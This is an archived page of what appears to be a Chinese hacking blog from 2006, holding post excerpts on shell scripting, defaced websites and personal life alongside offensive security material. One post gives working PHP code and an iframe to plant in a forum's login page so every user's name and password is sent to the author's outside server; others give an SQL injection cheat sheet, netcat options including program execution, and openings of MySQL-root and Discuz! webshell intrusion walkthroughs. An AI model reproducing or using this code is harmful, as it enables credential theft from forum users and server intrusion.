为了惩罚这种人,决定写个SHELL,在crond里每1分钟运行一次,自动统计非法线程的IP和线程数量,然后自动将他的IP地址写到iptables里,来惩罚一下他们!
在此,非常感谢“零二年的夏天”!他给了我很大的帮助!!!
这下可以惩罚一下那些贪得无厌的人了……
» 阅读全文
浏览模式: 标准 | 列表
2006年07月的文章
自动封杀非法连接FTP的IP
Posted by amxku on 2006-07-26, 03:52 . 技术相关
由于提供了FTP下载而又限制了线程,所以总发现有人不断用多线程进行尝试,这样会大大增加服务器的负荷,这种事“损人不利己”!
为了惩罚这种人,决定写个SHELL,在crond里每1分钟运行一次,自动统计非法线程的IP和线程数量,然后自动将他的IP地址写到iptables里,来惩罚一下他们!
在此,非常感谢“零二年的夏天”!他给了我很大的帮助!!!
这下可以惩罚一下那些贪得无厌的人了……
为了惩罚这种人,决定写个SHELL,在crond里每1分钟运行一次,自动统计非法线程的IP和线程数量,然后自动将他的IP地址写到iptables里,来惩罚一下他们!
在此,非常感谢“零二年的夏天”!他给了我很大的帮助!!!
这下可以惩罚一下那些贪得无厌的人了……
shell入门基础必备
Posted by amxku on 2006-07-26, 03:48 . 技术相关
1.建立和运行shell程序
什么是shell程序呢? 简单的说shell程序就是一个包含若干行shell或者linux命令的文件.象编写高级语言的程序一样,编写一个shell程序需要一个文本编辑器. 如VI等.在文本编辑环境下,依据shell的语法规则,输入一些shell/linux命令行,形成一个完整的程序文件.
执行shell程序文件有三种方法
(1)#chmod +x file(在/etc/profile中,加入export PATH=${PATH}:~/yourpath,就可以在命令行下直接运行,像执行普通命令一样)
什么是shell程序呢? 简单的说shell程序就是一个包含若干行shell或者linux命令的文件.象编写高级语言的程序一样,编写一个shell程序需要一个文本编辑器. 如VI等.在文本编辑环境下,依据shell的语法规则,输入一些shell/linux命令行,形成一个完整的程序文件.
执行shell程序文件有三种方法
(1)#chmod +x file(在/etc/profile中,加入export PATH=${PATH}:~/yourpath,就可以在命令行下直接运行,像执行普通命令一样)
» 阅读全文
今天好像有点不一样
Posted by amxku on 2006-07-24, 16:01 . 生活琐碎
http://www.zone-h.com.cn/mirror.php?zone=10035 鹰派被黑
http://www.zone-h.com.cn/mirror.php?zone=10020 博客中国被黑
http://www.zone-h.com.cn/mirror.php?zone=10019 红狼被黑
郁闷了,下午来的时间,在到zone-h审核站点的时候,发现有几个N的站被入侵了
最后看到自己的站也被挂了页子,想不到啊,安焦中国网络安全代表
有着中国黑客之父之称的中国鹰派
竟然安焦也被挂了,郁闷死了
Tags: 被黑站点
获取Dvbbs论坛全部用户密码
Posted by amxku on 2006-07-24, 13:53 . 技术相关
获取Dvbbs论坛全部用户密码
首先你必须有个一个PHP空间,假设我们的空间是http;//www.amxku.net,在目录下建立一个文件为amxku.php。
代码如下:
<?php
//amxku.php
$s=”pass.txt”; //密码保存为pass.txt
$fp=@fopen($s,”a+”); // 打开pass.txt,准备写了
$time = time(); //获取时间
$ip=”$REMOTE_ADDR”;//获取IP
$newfp= $time.”|”.$user.”|”.$password.”|”.$ip.”|”.chr(13).chr(10); //所有数据,时间,用户,密码,IP得分别属于newfp
@fclose($fp);//关闭pass.txt
?>
然后修改论坛login.asp,在最上面添加以下代码:
<iframe frameborder=0 width=’00%’ height=00 scrolling=no
src=http://www.amxku.net/amxku.php?user=<%=request.form(“username”)%>&password=<%=request.form(“password”)%>’></iframe>
这样对方登陆站点使用的帐号和密码就会保存在目录下的pass.txt里。
保存故事为:
时间|帐号|密码|IP地址..
首先你必须有个一个PHP空间,假设我们的空间是http;//www.amxku.net,在目录下建立一个文件为amxku.php。
代码如下:
<?php
//amxku.php
$s=”pass.txt”; //密码保存为pass.txt
$fp=@fopen($s,”a+”); // 打开pass.txt,准备写了
$time = time(); //获取时间
$ip=”$REMOTE_ADDR”;//获取IP
$newfp= $time.”|”.$user.”|”.$password.”|”.$ip.”|”.chr(13).chr(10); //所有数据,时间,用户,密码,IP得分别属于newfp
@fclose($fp);//关闭pass.txt
?>
然后修改论坛login.asp,在最上面添加以下代码:
<iframe frameborder=0 width=’00%’ height=00 scrolling=no
src=http://www.amxku.net/amxku.php?user=<%=request.form(“username”)%>&password=<%=request.form(“password”)%>’></iframe>
这样对方登陆站点使用的帐号和密码就会保存在目录下的pass.txt里。
保存故事为:
时间|帐号|密码|IP地址..
Discuz!论坛写入WEBSHELL
Posted by amxku on 2006-07-24, 13:48 . 技术相关
书写错误,导致恶意用户构造语句可以写入webshell,进而控制整个服务器。
前几个晚上,把前台文件,只要是数据库调用中的变量都看了一遍。看看是不是有过滤不严的地方,看完后觉得,过滤不严的地方的确不少,但是都已经被单引号保护起来了。在php中,如果magic_qoute_gpc=on(默认的)编译器会自动把单引号等特殊字符转义,而这个时候我们想改变程序的执行流程是非常困难的。这样大大的增加了入侵的难度,在某种程度上,也的确保证了其安全。这也是为什么朋友提出一定要在magic_qoute_gpc为on的时候依然可以利用的要求。如果需要单引号介入才能利用的漏洞,在Discuz!论坛中基本上是没什么用处的。
前几个晚上,把前台文件,只要是数据库调用中的变量都看了一遍。看看是不是有过滤不严的地方,看完后觉得,过滤不严的地方的确不少,但是都已经被单引号保护起来了。在php中,如果magic_qoute_gpc=on(默认的)编译器会自动把单引号等特殊字符转义,而这个时候我们想改变程序的执行流程是非常困难的。这样大大的增加了入侵的难度,在某种程度上,也的确保证了其安全。这也是为什么朋友提出一定要在magic_qoute_gpc为on的时候依然可以利用的要求。如果需要单引号介入才能利用的漏洞,在Discuz!论坛中基本上是没什么用处的。
» 阅读全文
Tags: 脚本渗透
昨天去登山了
Posted by amxku on 2006-07-23, 05:56 . 生活琐碎
昨天去登山了
登山,不错的运动
不过山不怎么高,
新的SKIN换上了,有很多不好的地方正在改在,因为对CSS不好,所以要能会慢了点
改好后有哪位朋友想要再吧
注入一路小跑 自己学习用的
Posted by amxku on 2006-07-18, 23:04 . 技术相关
1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是mssql ;and user>0
3.注入参数是字符'and [查询条件] and ''='
4.搜索时没过滤参数的'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
2.初步判断是否是mssql ;and user>0
3.注入参数是字符'and [查询条件] and ''='
4.搜索时没过滤参数的'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
» 阅读全文
Tags: 脚本渗透
nc.exe
Posted by amxku on 2006-07-18, 17:20 . 杂七杂八
nc.exe -h即可看到各参数的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
» 阅读全文
Tags: 工具
对中国红客联盟的一次测试
Posted by amxku on 2006-07-18, 04:10 . 技术相关
mysql的入侵
Posted by amxku on 2006-07-15, 18:35 . 技术相关
今天在弄服务器的时间,无意中发现了MYSQL的ROOT用户密码,哈,看来运气不错哈
首先在TEST数据库下创建一个新的表;
mysql>create table a (cmd text);
好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
在表中插入内容
首先在TEST数据库下创建一个新的表;
mysql>create table a (cmd text);
好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
在表中插入内容
» 阅读全文
Categories
Archives
- 2008年12月 (2)
- 2008年11月 (5)
- 2008年10月 (4)
- 2008年09月 (10)
- 2008年08月 (6)
- 2008年07月 (8)
- 2008年06月 (8)
- 2008年05月 (10)
Recent Comments
- 不错,不错,比md5sum好用,可以check子目录。
12-03 - 路过 - 唯一遗憾的是 单线程
12-02 - Gowiththewind - <?phpecho adasd;?>
12-02 - Gowiththewind - 你好 我也是做php方面的 我想跟你学黑客 可以么 可以的话...
12-02 - Gowiththewind - 珍爱生命 拒绝短信
12-01 - 冷焰 - 打劫打劫,哈哈
12-01 - nt_family - 。。。。。
11-30 - 安静 - 不过好像听说手感不怎么好。
11-30 - IK - http://auction1.taobao.com/auct...
11-30 - IK - igo 蓝牙键盘
11-30 - amxku - 淘宝上500左右
11-30 - amxku - 多少钱? 我想搞一个
11-30 - void - 更多...
Statistics
Blogroll
Meta
Processed in 0.017508 second(s), 2 queries, Gzip enabled
Copyright © 2005- 2008 amxku's blog. Supported by S.4.T 鄂ICP备05024839号
Copyright © 2005- 2008 amxku's blog. Supported by S.4.T 鄂ICP备05024839号